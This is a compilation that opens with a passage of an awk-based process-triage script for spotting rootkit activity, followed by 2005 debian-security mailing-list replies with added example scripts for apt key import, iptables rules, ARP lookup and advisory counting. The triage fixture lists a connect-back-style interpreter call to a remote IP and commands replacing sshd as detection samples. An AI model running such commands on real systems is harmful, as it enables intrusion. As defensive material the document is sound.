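# Constructed from the process list quoted in the thread, plus a www-data
# httpd worker and two kernel threads that must NOT be flagged.
SAMPLE_PS='UID        PID  PPID  C STIME TTY          TIME CMD
root         2     0  0 Jan10 ?        00:00:00 [kthreadd]
root        15     2  0 Jan10 ?        00:00:03 [kswapd0]
root       955     1  0 Jan10 ?        00:00:11 /usr/local/apache/bin/httpd
root      1471     1  0 Jan10 ?        00:00:00 /usr/local/snmp/sbin/snmpd
www-data  6001   955  0 06:30 ?        00:00:00 /usr/local/apache/bin/httpd
nobody    4824  4752  0 06:40 ?        00:00:00 ./ptr3
nobody    4825  4824  0 06:40 ?        00:00:00 [ptr3 ]
root      4920     1  0 06:41 ?        00:00:00 chmod 755 /usr/local/bin/ssh2
root      4925  4920  0 06:41 ?        00:00:00 [chmod ]
root      4927     1  0 06:41 ?        00:00:00 mv -f sshd /usr/sbin/sshd
root      4929     1  0 06:41 ?        00:00:00 chown root.bin /usr/sbin/sshd
nobody    4967  4964  0 06:42 ?        00:00:00 perl clean 220.228.110.11 2025
nobody    5030  5005  0 06:43 ?        00:00:00 ./traci
nobody    5031  5030  0 06:43 ?        00:00:00 ./traci
nobody    5032  5030  0 06:43 ?        00:00:00 [traci ]
root      5033  5030  0 06:43 ?        00:00:00 [modprobe ]'

# Read the whole table first so a child can be judged by its parent's UID,
# then emit one ALERT line per suspicious process, in listing order.
triage_ps() {
    awk '
    NR == 1 { next }                                  # column header
    {
        cmd = $8
        for (i = 9; i <= NF; i++) cmd = cmd " " $i    # CMD may contain spaces
        uid[$2] = $1; ppid[$2] = $3; cmdline[$2] = cmd; order[++n] = $2
    }
    END {
        for (k = 1; k <= n; k++) {
            p = order[k]; u = uid[p]; pp = ppid[p]; c = cmdline[p]; why = ""
            if (u == "root" && (pp in uid) && uid[pp] != "root")
                why = "root process whose parent runs as " uid[pp] " (privilege escalation?)"
            else if (c ~ /^\[/ && pp != 0 && pp != 2)
                why = "kernel-thread style name with a userland parent (hidden process?)"
            else if (u != "root" && c ~ /^\.\//)
                why = "service account running a binary from a relative path"
            else if (c ~ /^(perl|sh|bash|python) / && c ~ /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/)
                why = "interpreter started with a remote address (connect-back shell?)"
            else if (u == "root" && c ~ /^(chmod|chown|mv|cp) / && c ~ /\/(usr\/)?(local\/)?s?bin\//)
                why = "root replacing or re-permissioning a system binary (trojan install?)"
            if (why != "")
                printf "ALERT pid=%s uid=%s ppid=%s cmd=\"%s\" :: %s\n", p, u, pp, c, why
        }
    }'
}

# Stand-alone demonstration on the constructed table.
printf '%s\n' "$SAMPLE_PS" | triage_ps
```

On a live box run it as `ps -ef | triage_ps` using a `ps` from known-good media, since a rootkit's replacement `ps` will happily hide exactly the rows this is looking for; the alerts then tell you which PIDs to capture (`ls -l /proc/PID/exe`, `/proc/PID/cwd`) before pulling the network cable.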





Re: Light weight IDSes and then some

2005-07-15 Thread Steve Kemp
On Fri, Jul 15, 2005 at 11:58:26AM -0500, George P Boutwell wrote:

> The Security Debian How-To mentions Tripwire.  Looking at AIDE and
> Tripwire in the debian packages repositories it's hard to tell the
> difference.  I'm sure they both do the job, anyone with experience
> with both these packages can describe some of the pros and cons of
> each?

  Simple introduction to both aide, and integrit:

http://www.debian-administration.org/articles/49

  It doesn't mention tripwire, which is a shame.  But I'll try to
 update it later.

Steve
--
# The Debian Security Audit Project.
http://www.debian.org/security/audit





Re: Timeliness of Debian Security Announceness? (DSA 756-1 Squirrelmail)

2005-07-14 Thread Steve Kemp
On Thu, Jul 14, 2005 at 05:40:22PM +0200, Herwig Wittmann wrote:

> This would be very convenient- but the delay that seems to have passed
> between the original squirrelmail security announcement and the time I
> received the alert via [EMAIL PROTECTED] is worrying:
> 
> The Vulnerability seems to have been described a few weeks ago:
> http://www.squirrelmail.org/security/issue/2005-06-15
> 
> The Debian Security Advisory 756-1 is dated July 13th, 2005.

  This has been discussed already in the archives, you should probably
 refer to those rather than reviving the subject.

  eg the following three threads:

http://lists.debian.org/debian-security/2005/06/msg00055.html

http://lists.debian.org/debian-security/2005/06/msg00097.html

http://lists.debian.org/debian-security/2005/06/msg00142.html

> I do not want to be rude in any way- please try to excuse my way of putting
> things, but does anybody have a prediction how probable it is for such a
> thing to happen again?

  It's unknown whether the build infrastructure problems will recur,
 machines do die so it's possible.  The communication problems leading
 to various misunderstandings I hope will be less likely to reoccur.

> Is there a role/function in debian that is responsible for reviewing
> bugtraq or similar sources, and is ensured that this role is fulfilled
> every day?

  The security team do follow bugtraq, etc.  Filing bugs with patches
 is a useful thing to do - but forwarding a message that has been posted
 publicly already is perhaps less useful.  It's not like there's not
 enough spam mail sent to [EMAIL PROTECTED] already ;)

> Or will there be other measures in place to see that security issues are
> noticed quickly for all packages- even for strange tools that
> are not used by normal unix-centered developers?

  I'm unsure exactly what you are suggesting about less popular tools.
 Sure if five issues need fixing simultaneously the "less used" is
 liable to suffer if there's a more important bug.

  Still even less popular tools are supported, all packages should
 receive updates eventually.

Steve
--
# The Debian Security Audit Project.
http://www.debian.org/security/audit





Re: [SECURITY] [DSA 742-1] New cvs packages fix arbitrary code execution

2005-07-07 Thread steve
Hello,

I am on vacation until 20 July.
For support questions you can contact our support desk.
For sales and other questions you can email [EMAIL PROTECTED]

Kind regards,
Steve Karnadi



Hello,

I am on vacation until the 20th of July.

You can contact our supportdesk for support questions.
Sales questions or other questions can be sent to [EMAIL PROTECTED]

Regards,
Steve Karnadi







Re: gpg-errors with apt

2005-07-07 Thread Steve Kemp
On Thu, Jul 07, 2005 at 02:14:51PM +0200, Johann Spies wrote:

> Ok, but the archive on archive3.sun.ac.za is just a mirror from a
> primary debian upstream source.  Do I have to generate a spesific key
> for my server?

  Strange .. but no, you need do nothing with your key(s).

> > > NO_PUBKEY 07DC563D1F41B907 W: You may want to update the package lists
> > > to correct these missing files
> > 
> >   Find the key that the archive is signed with, import it as you
> >  did for the main Sid/Etch archive and all should be well.
> 
> And where do I find this key?

   gpg --keyserver some.key.server --recv-keys 07DC563D1F41B907 

  (For keyservers I use:
   keyring.debian.org 
   pgp.mit.edu
   pgpkeys.pgp.net
   wwwkeys.uk.pgp.net
or wwwkeys.pgp.net )


Steve
--





Re: gpg-errors with apt

2005-07-07 Thread Steve Kemp
On Thu, Jul 07, 2005 at 12:22:36PM +0200, Johann Spies wrote:

> I have read http://www.debian-administration.org/articles/174 about
> this topic and have done what the article suggested:
> "~# gpg --keyserver keyring.debian.org --recv 4F368D5D"

  This imports the key for the Debian Unstable archive.

> Got a timeout here.

  Firewall?

> "Or if you wish you can download it from the internet, from
> http://www.debian.org/releases/ -
> towards the bottom of the page there's a link to the file
> "ziyi_key_2005.asc".
> 
> Download this and import it as follows:
> 
> [EMAIL PROTECTED]:~# cat ziyi_key_2005.asc | gpg --import"

  (Bad '"' on the end of that command line.. mistake in copy + paste?)

> I have done this but I still get the following on aptitude update (on
> sid):
> 
> W: GPG error: ftp://archive3.sun.ac.za unstable Release: The following
> signatures couldn't be verified because the public key is not
> available: NO_PUBKEY F1D53D8C4F368D5D 

  This is a completely different key - here the complaint is that the
 archive you have in your apt.sources list, for archive3.sun.ac.za,
 is signed with a key 'F1D53D8C4F368D5D' which you don't have imported.

>W: GPG error:
> ftp://archive3.sun.ac.za unstable Release: The following signatures
> couldn't be verified because the public key is not available:

  And the error says as much.  The signature isn't verified because
 you're missing the key.

> NO_PUBKEY 07DC563D1F41B907 W: You may want to update the package lists
> to correct these missing files

  Find the key that the archive is signed with, import it as you
 did for the main Sid/Etch archive and all should be well.

> Is this a bug or how do I solve this problem?

  Not a bug with the *Debian* archive, but a missing key on your
 side from the look of things..

Steve
--
# The Debian Security Audit Project.
http://www.debian.org/security/audit
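A script that pulls the NO_PUBKEY IDs out of apt's warnings, decides which of them still need importing, and only then fetches a key, checking its fingerprint against one obtained out of band before apt is told to trust it. This is an added example, not code from the thread; the apt output it parses is constructed (reusing the two key IDs quoted above), and `keyring.debian.org` is merely the default keyserver, taken from Steve's list.

```shell
#!/bin/sh
# Added example: find which archive keys apt is complaining about, import
# only the missing ones, and verify each fetched key's fingerprint before
# handing it to apt.

# Constructed apt output, modelled on the warnings quoted in the thread.
sample_apt_output() {
    cat <<'EOF'
W: GPG error: ftp://archive3.sun.ac.za unstable Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY F1D53D8C4F368D5D
W: GPG error: ftp://archive3.sun.ac.za unstable Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 07DC563D1F41B907
W: GPG error: ftp://archive3.sun.ac.za unstable Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 07DC563D1F41B907
W: You may want to update the package lists to correct these missing files
EOF
}

# missing_pubkeys < apt-output
# Print every key ID that follows a NO_PUBKEY token, once each, in the order
# first seen. apt repeats the same warning per index file, hence the dedup.
missing_pubkeys() {
    awk '{ for (i = 1; i < NF; i++)
               if ($i == "NO_PUBKEY" && !seen[$(i+1)]++) print $(i+1) }'
}

# keys_to_import "ID1 ID2 ..." < apt-output
# First argument: whitespace-separated key IDs already present in the apt
# keyring (from `apt-key list` or `gpg --list-keys`). Prints the IDs that
# apt wants but the keyring lacks.
keys_to_import() {
    present=" $(printf '%s' "$1" | tr '\n' ' ') "
    missing_pubkeys | while read -r keyid; do
        case "$present" in
            *" $keyid "*) ;;                 # already imported
            *) printf '%s\n' "$keyid" ;;
        esac
    done
}

# import_key_verified KEYID EXPECTED_FINGERPRINT [KEYSERVER]
# Fetch the key, then compare its full fingerprint with one obtained out of
# band (the archive's own web page, a signed announcement, a copy already
# trusted elsewhere). A key whose fingerprint does not match is deleted
# again instead of being added to apt. Needs the network, so the test
# below does not call it.
import_key_verified() {
    keyid=$1; expected=$2; keyserver=${3:-keyring.debian.org}
    gpg --keyserver "$keyserver" --recv-keys "$keyid" || return 1
    actual=$(gpg --with-colons --fingerprint "$keyid" | awk -F: '/^fpr/ { print $10; exit }')
    if [ "$actual" != "$expected" ]; then
        echo "fingerprint mismatch for $keyid: got $actual" >&2
        gpg --batch --yes --delete-keys "$actual"
        return 1
    fi
    # The 2005-era way of handing a key to apt; see the note below.
    gpg --export "$keyid" | apt-key add -
}
```

`apt-key add` is what a sarge-era system used. Current Debian releases deprecate it: the exported key goes under `/etc/apt/trusted.gpg.d/` or, better, into a keyring named in the source's `signed-by=` option, which limits the key to the one archive it actually signs instead of letting it authenticate every source on the machine.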





Re: [SECURITY] [DSA 741-1] New bzip2 packages prevent decompression bomb

2005-07-07 Thread steve
Hello,

I am on holiday until 20 July.
For support questions you can contact our support desk.
For sales and other questions you can email [EMAIL PROTECTED]

Kind regards,
Steve Karnadi



Hello,

I am on vacation until the 20th of July.

You can contact our supportdesk for support questions.
Sales questions or other questions can be sent to [EMAIL PROTECTED]

Regards,
Steve Karnadi







Re: Firewall-troubleshooting

2005-07-02 Thread Steve Kemp
On Sat, Jul 02, 2005 at 04:46:29PM -0400, KC wrote:

> I need help understanding what goes wrong in this script. I cannot ping
> anyone and cannot resolve as well. In fact I believe the only thing I can
> get is an ip address from my isp's dhcp server.

  There's no way I'm going to read through all of that and try to 
 understand it.

  Perhaps you'd be better off starting with a smaller firewall script
 and then adding to it as you need?

  One thing did stand out though, you don't allow outgoing connections
 generally.  These lines:

> iptables --policy OUTPUT DROP
> iptables -t nat --policy OUTPUT DROP
> iptables -t mangle --policy OUTPUT DROP

  They seem to say "no output except that which is explicitly allowed".

  For a big network I too would restrict outgoing connections, but for
 a home machine with only trusted hosts?  It's an additional complication
 which doesn't gain you much.

  (Sure if you had a trojan which phoned home, or tried to compromise
 other hosts .. it would help.  But .. in general it is less useful than
 it appears).

Steve
--
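The two OUTPUT policies discussed above, side by side, as an added example that is not the original poster's script or anything from the thread. Both rulesets are in iptables-restore format; the first is the simple home-machine policy Steve suggests, the second keeps OUTPUT DROP but adds the holes for DHCP, DNS and ping whose absence produces exactly the symptoms reported (a lease, but no name resolution and no ping). The interface name `eth0` and the list of allowed client ports are assumptions.

```shell
#!/bin/sh
# Added example: a small host firewall for a single home machine, in
# iptables-restore format, with the two OUTPUT policies discussed above.
# The interface name is an assumption; override with WAN_IF=....
WAN_IF=${WAN_IF:-eth0}

# Common INPUT side: drop by default, allow loopback and replies to
# connections this host opened.
fw_input_rules() {
    cat <<EOF
-A INPUT -i lo -j ACCEPT
-A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
EOF
}

# Variant 1: the simple policy Steve suggests for a home box. Outgoing
# traffic is allowed; only unsolicited incoming traffic is dropped.
fw_rules_open_output() {
    cat <<EOF
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
$(fw_input_rules)
COMMIT
EOF
}

# Variant 2: OUTPUT DROP kept, as in the original script, plus the holes
# its author was missing. Without them a machine typically still gets a
# DHCP lease (the client's initial exchange uses a packet socket that
# bypasses the filter table) and then can neither resolve names nor ping.
fw_rules_strict_output() {
    cat <<EOF
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT DROP [0:0]
$(fw_input_rules)
-A OUTPUT -o lo -j ACCEPT
-A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
# DHCP renewals: client port 68 to server port 67
-A OUTPUT -o $WAN_IF -p udp --sport 68 --dport 67 -j ACCEPT
-A INPUT -i $WAN_IF -p udp --sport 67 --dport 68 -j ACCEPT
# DNS, TCP as well as UDP (answers over 512 bytes retry over TCP)
-A OUTPUT -o $WAN_IF -p udp --dport 53 -j ACCEPT
-A OUTPUT -o $WAN_IF -p tcp --dport 53 -j ACCEPT
# outbound ping; the echo-reply returns as ESTABLISHED
-A OUTPUT -o $WAN_IF -p icmp --icmp-type echo-request -j ACCEPT
# the client protocols this host is allowed to speak; extend as needed
-A OUTPUT -o $WAN_IF -p tcp -m multiport --dports 22,80,443 -j ACCEPT
COMMIT
EOF
}

# rule_count RULESET_FN: number of -A rules a ruleset contains.
rule_count() { "$1" | grep -c '^-A'; }

# apply_rules RULESET_FN: load the ruleset atomically (needs root).
# With DRY_RUN=1 the ruleset is printed instead of loaded.
apply_rules() {
    if [ "${DRY_RUN:-0}" = 1 ]; then "$1"; else "$1" | iptables-restore; fi
}
```

Loading through `iptables-restore` replaces the whole table in one step, so a half-applied script never locks you out between two `iptables` commands; run `DRY_RUN=1 apply_rules fw_rules_strict_output` first to see exactly what would be loaded.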





Re: Bad press related to (missing) Debian security

2005-06-27 Thread Steve Kemp
On Mon, Jun 27, 2005 at 09:05:53PM +0200, martin f krafft wrote:

> > The secretary position was originally created to help this
> > situation, but it was never really clear to me what my role was
> > supposed to be.
> 
> I never understood it either.
> 
> How much information can be disclosed about the inner workings of
> the security team without damage?

  I don't see that the workings of the team itself are particularly
 sensitive, only the actual packages being worked upon.  (Responsible
 disclosure / coordinated releases, etc).

  A long time ago I wrote a small introduction to how it works,
 none of it is surprising, and none of it is sensitive in any
 way that I can see:

http://people.debian.org/~skx/team.html

Steve
--





Re: Bad press related to (missing) Debian security

2005-06-27 Thread Steve Kemp
On Mon, Jun 27, 2005 at 08:39:43PM +0200, Marek Olejniczak wrote:

> I don't understand the philosophy of Debian security team. It's really so 
> difficult to push into sarge spamassassin 3.0.4 which is not vulnerable? 
> This version is in Debian testing and why this version can't be push into 
> stable?

  In some cases fixing a problem, which an upstream will not, or
 which the package maintainer cannot is *very* hard work.  (eg. Mozilla/
 Kernel images).

  In this particular case pushing the package itself isn't a hard
 job - the problem we're currently seeing isn't that the job is
 hard, but that only a very small number of people have the 
 authority/ability to push the update out.

Steve
--





Re: Bad press related to (missing) Debian security

2005-06-27 Thread Steve Kemp
On Mon, Jun 27, 2005 at 02:36:12PM -0400, Noah Meyerhans wrote:

> Even allowing uploads from the secretaries could be helpful. 

  Definitely.  

  I've got fixed packages available right now for some of the 
 bugs which have been raised in this thread, but until somebody
 can push out the advisories they're just sat around gathering dust.

> Part of the problem with security updates has to do with the fact that
> it's just difficult to coordinate the work.

  That's probably true, and kinda an argument against suddenly adding
 more members too ...

> The secretary position was originally created to help this situation, 
> but it was never really clear to me what my role was supposed to be.

  I admit the role of the position is also a mystery to me, but one
 that I've not worried too much about.

  Reviewing patches and building fixed packages is what I've tried
 to do - whether that is the intended job of a secretary is largely
 irrelevant.

  Other jobs like answering mails from people who say "Help my
 server is hacked" seem more "secretarial" in nature, so I've tried
 to answer those as time and details permit.

Steve
--
www.steve.org.uk





Re: getting the MAC address from an ip

2005-06-24 Thread Steve Kemp
On Fri, Jun 24, 2005 at 02:52:40PM +0200, LeVA wrote:

> How can I get a machine's MAC address, if I only know its IP?

  If it's on your LAN ping it then look at your arp cache:

[EMAIL PROTECTED]:~$ ping -c 1 192.168.1.1 >/dev/null
[EMAIL PROTECTED]:~$ /usr/sbin/arp 192.168.1.1
Address  HWtype  HWaddress   Flags Mask  Iface
sun  ether   08:00:20:C2:1E:F6   C eth0


  Or if you have a login you can use ifconfig to read it:

[EMAIL PROTECTED]:~$ /sbin/ifconfig |grep HWaddr
eth0  Link encap:Ethernet  HWaddr 00:0A:E6:F6:A3:F4  

  If it's a remote host then you cannot.

Steve
--
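The same lookup as a script, added here as an example that is not from the thread: it parses either the classic `arp -n` table shown above or the newer `ip neigh` listing, treats unresolved entries as "no answer", and refuses to ping-and-read for an address that is not on a local segment, since for a remote host the cache can only ever hold the gateway's MAC. The cache listings it parses are constructed (the first MAC is the one from Steve's output), and `lookup_mac` needs a real network so the test exercises only the parser.

```shell
#!/bin/sh
# Added example: read a neighbour's MAC out of the local ARP/neighbour
# cache, for either `arp -n` or the newer `ip neigh` output format.

# Constructed cache listings; the first MAC is the one shown in the thread.
sample_ip_neigh() {
    cat <<'EOF'
192.168.1.1 dev eth0 lladdr 08:00:20:c2:1e:f6 REACHABLE
192.168.1.9 dev eth0 FAILED
fe80::1 dev eth0 lladdr 08:00:20:c2:1e:f6 router STALE
EOF
}
sample_arp() {
    cat <<'EOF'
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   08:00:20:C2:1E:F6   C                     eth0
192.168.1.9                      (incomplete)                              eth0
EOF
}

# mac_for_ip IP < cache-listing
# Prints the hardware address for IP, or nothing when the entry is absent
# or unresolved (FAILED / incomplete), so callers can test for "no answer".
mac_for_ip() {
    awk -v ip="$1" '
        $1 == ip && $4 == "lladdr" { print $5; exit }   # ip neigh format
        $1 == ip && $2 == "ether"  { print $3; exit }   # arp -n format
    '
}

# on_link IP: true when the route to IP has no "via" gateway, i.e. when an
# ARP entry for it can exist at all. For a remote host the cache only ever
# holds the gateway's MAC, which is Steve's last point.
on_link() {
    ip route get "$1" 2>/dev/null | head -n 1 | grep -q -v ' via '
}

# lookup_mac IP: the procedure from the thread, guarded for remote
# addresses: refuse unless on-link, ping once to populate the cache, then
# read it back. Needs the network, so it is not exercised by the test.
lookup_mac() {
    on_link "$1" || { echo "$1 is not on a local segment; no ARP entry possible" >&2; return 1; }
    ping -c 1 -W 1 "$1" >/dev/null 2>&1
    ip neigh show "$1" | mac_for_ip "$1"
}
```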





Re: debian security archive/updates b0rken???

2005-06-18 Thread Steve Langasek
On Sun, Jun 19, 2005 at 12:31:23AM -0400, sean finney wrote:
> please excuse this blatant cross-posting, i wouldn't do it if i didn't
> think it were critical that i do so...

> http://www.infodrom.org/~joey/log/?200506142140

> say it isn't so!

It isn't so.  It's true that the design of sbuild/wanna-build means there
were no autobuilders available for stable-security at the moment of sarge's
release, but there was already work in progress to fix this by the time that
blog entry was posted, and the claim that "it looks like we'll be without
security updates for quite a while" caused no small amount of consternation.

TTBOMK, there is now again a full complement of stable-security autobuilders
available on 11 archs, and autobuilders for testing-security on 10/11 archs.
It doesn't look like the security team has issued any DSAs since then,
though they may have done uploads that haven't yet been published (I
wouldn't know, not having access to look on klecker).

-- 
Steve Langasek
postmodern programmer




Re: Please allow drupal 4.5.3-1

2005-06-02 Thread Steve Langasek
On Fri, Jun 03, 2005 at 08:19:22AM +0200, Martin Schulze wrote:
> Steve Langasek wrote:
> > On Wed, Jun 01, 2005 at 07:16:00PM -0700, Ian Eure wrote:
> > > On Wednesday 01 June 2005 04:54 pm, Hilko Bengen wrote:
> > > > Just a few hours ago, the Drupal project has released version 4.5.3, a
> > > > bugfix release which fixes a serious security bug. I have created and
> > > > just uploaded a 4.5.3-1 package to unstable. Updated Debconf
> > > > translations are the only additional changes over 4.5.2-3 which is
> > > > the version in sarge.
> > > Any reason why you can't just apply the patch to fix that specific bug?

> > > And you probably want to be emailing the release team...

> > He did contact the release team; unfortunately, the diff between 4.5.2 and
> > 4.5.3 is rather large and I don't believe it's all security-related, so I
> > think this will have to be left for the security team after all.

> Umh, the release team most probably has even stricter rules than the
   ^^^ security, I guess :)
> release team when it comes to cluttering the diff...

Absolutely -- but the release team has a deadline before which the fix must
be in unstable in order for it to be included in sarge (and if everything
goes according to plan, this deadline is in 12 hours), whereas you can take
as much time as you want to going back and forth with the maintainer until
he gets it right. :)

-- 
Steve Langasek
postmodern programmer




Re: Please allow drupal 4.5.3-1

2005-06-02 Thread Steve Langasek
On Wed, Jun 01, 2005 at 07:16:00PM -0700, Ian Eure wrote:
> On Wednesday 01 June 2005 04:54 pm, Hilko Bengen wrote:
> > Just a few hours ago, the Drupal project has released version 4.5.3, a
> > bugfix release which fixes a serious security bug. I have created and
> > just uploaded a 4.5.3-1 package to unstable. Updated Debconf
> > translations are the only additional changes over 4.5.2-3 which is
> > the version in sarge.
> Any reason why you can't just apply the patch to fix that specific bug?

> And you probably want to be emailing the release team...

He did contact the release team; unfortunately, the diff between 4.5.2 and
4.5.3 is rather large and I don't believe it's all security-related, so I
think this will have to be left for the security team after all.

Thanks,
-- 
Steve Langasek
postmodern programmer




Re: Security issue with 'elog' package

2005-05-03 Thread Steve Langasek
On Wed, May 04, 2005 at 12:15:15AM +0300, Recai Oktas wrote:
> I uploaded the new upstream of Elog a few days ago (this is a sponsored
> package).  I've just noticed a possible security flaw which affects both
> versions in testing (2.5.7+r1558) and unstable (2.5.8+r1637), as can be
> seen in the following CVS log of r1.638:

> http://midas.psi.ch/cgi-bin/cvsweb/elog/src/elogd.c

> Since the fix[1] is so trivial to backport, I can easily prepare a new
> package for just the version in testing.

Please do so, unless you can point us to a release-critical bug addressed by
the version currently in unstable.

Thanks,
-- 
Steve Langasek
postmodern programmer




Re: Apache 1.3.33 (from sarge) and mod_chroot

2005-03-26 Thread Steve Suehring

I've had good luck with nullmailer for just this situation.  It's simple 
and lightweight, works well in chroot.

Steve

===
= Home Page:  http://www.braingia.org/=
===


On Thu, Mar 24, 2005 at 07:31:03AM +0100, Krzysztof Jóźwiak wrote:
> Hello!
> 
> My web server was hacked a few days ago and I decided to install some 
> new program and modules which improve security.
> I find in sarge libapache-mod-chroot which chroots apache (and it works 
> fine) but I can't send mail from php.
> I installed ssmtp in chroot (I think so) in chroot environment but it 
> doesn't help :(
> 
> Does  anyone use this module? Perhaps I do something wrong with it ssmtp...
> 
> --
> Krzysztof Jozwiak
> Debian administrator
> 
> 
> 
> 





Re: Apache 1.3.33 (from sarge) and mod_chroot

2005-03-24 Thread Steve Kemp
On Thu, Mar 24, 2005 at 07:31:03AM +0100, Krzysztof Jóźwiak wrote:

> My web server was hacked a few days ago and I decided to install some 
> new program and modules which improve security.

  Good plan.

  Did you find the source of the attack?  If not you're at risk from
 a repeat of the previous one ..

> I find in sarge libapache-mod-chroot which chroots apache (and it works 
> fine) but I can't send mail from php.
> I installed ssmtp in chroot (I think so) in chroot environment but it 
> doesn't help :(

  I can't help you there, but I would suggest you look at mod-security;
 you can find it in Sarge.

  The homepage has lots of documentation, and it includes chroot
 functionality:

http://www.modsecurity.org/

  There's a brief introduction here:

http://www.debian-administration.org/?article=65

Steve
--





Re: Analysis vulnerabilities associated to published security advisories, anyone?

2005-03-09 Thread Steve Kemp
On Wed, Mar 09, 2005 at 08:05:40PM +0100, David Schmitt wrote:
> On Wednesday 09 March 2005 19:13, Steve Kemp wrote:
> >   A simple script I wrote did that for me already - although there are
> >  some fixups required as we seem to have a few different spellings
> >  for different things.  eg. sanitizing vs sanitising.
> >
> >   You can see the simple output here along with input and output.
> >
> >  http://people.debian.org/~skx/2005/
> 
> Nice script. I fixed it up to sanitise 'sanitizations' and sort output by 
> count. diff attached.

  Thanks, I've applied it and updated the page.

Steve
--





Re: Analysis vulnerabilities associated to published security advisories, anyone?

2005-03-09 Thread Steve Kemp
On Wed, Mar 09, 2005 at 12:25:06PM +0100, Javier Fernández-Sanguino Peña wrote:

> Maybe you've seen it already, but the guys at Ubuntu have done a
> light-weight analysis of the vulnerabilities they have been released since
> "Warty" was released: https://www.ubuntulinux.org/wiki/USNAnalysis

  A nice page.

> This analysis does not match the one on ICAT's database
> (http://icat.nist.gov/icat.cfm?function=statistics) but probably is related
> to the fact that a lot of tempfile races have been found and reported
> recently by the Security Audit team.

  Yes.

> I would like somebody to do a similar analysis regarding Debian's 
> vulnerabilities (Ubuntu vulns are probably a subset of those affecting 
> woody). Has anyone enough spare time?

  I'd be interested in helping out, it seems like it shouldn't take
 too long to break things down into the type of the vulnerability and
 local vs. remote.

  A simple script I wrote did that for me already - although there are
 some fixups required as we seem to have a few different spellings
 for different things.  eg. sanitizing vs sanitising.

  You can see the simple output here along with input and output.

http://people.debian.org/~skx/2005/

  I'd be interested in average advisories per week, as well as
 classification on the actual output.  (Seems like buffer overflows
 are still the biggest reported thing for this year - although you've
 done a good job at showing temporary file issues).

Steve
--
# The Debian Security Audit Project.
http://www.debian.org/security/audit
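A keyword classifier in the spirit of the script Steve describes, added here as an example; it is not his script and the advisory summaries it reads are constructed, with placeholder IDs instead of real DSA numbers. It shows the part the thread found necessary in practice: folding the different spellings (sanitizing vs sanitising) and plurals into one form before counting, so that a single pattern per vulnerability class is enough.

```shell
#!/bin/sh
# Added example: classify advisory summaries by vulnerability type and
# count them, normalising spelling first so "sanitizing" and "sanitising"
# land in the same bucket.

# Constructed summaries with placeholder IDs; the real script reads the
# advisory titles themselves.
sample_advisories() {
    cat <<'EOF'
EXAMPLE-01 mail reader: missing input sanitising
EXAMPLE-02 samba: buffer overflow
EXAMPLE-03 imagemagick: buffer overflows
EXAMPLE-04 telnet client: Buffer Overflow
EXAMPLE-05 remstats: insecure temporary file
EXAMPLE-06 wu-ftpd: denial of service
EXAMPLE-07 axel: buffer overflow
EXAMPLE-08 mysql: insecure temporary files
EXAMPLE-09 php4: missing input sanitization
EXAMPLE-10 bzip2: decompression bomb
EOF
}

# normalise_summary < text: lower-case, then fold the British/American
# spellings and plurals into one form so one pattern per class suffices.
normalise_summary() {
    tr '[:upper:]' '[:lower:]' |
    sed -e 's/sanitiz/sanitis/g' \
        -e 's/buffer overflows/buffer overflow/g' \
        -e 's/temporary files/temporary file/g'
}

# classify_advisories < text: one line per class, "COUNT CLASS", largest
# count first. The first matching pattern wins, so order the patterns from
# most to least specific; anything unmatched is reported as "other" so the
# fixup list can be extended rather than silently losing entries.
classify_advisories() {
    normalise_summary | awk '
        /buffer overflow/    { c["buffer overflow"]++; next }
        /sanitis/            { c["missing input sanitising"]++; next }
        /temporary file/     { c["insecure temporary file"]++; next }
        /denial of service/  { c["denial of service"]++; next }
                             { c["other"]++ }
        END { for (k in c) printf "%d %s\n", c[k], k }
    ' | sort -rn
}
```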




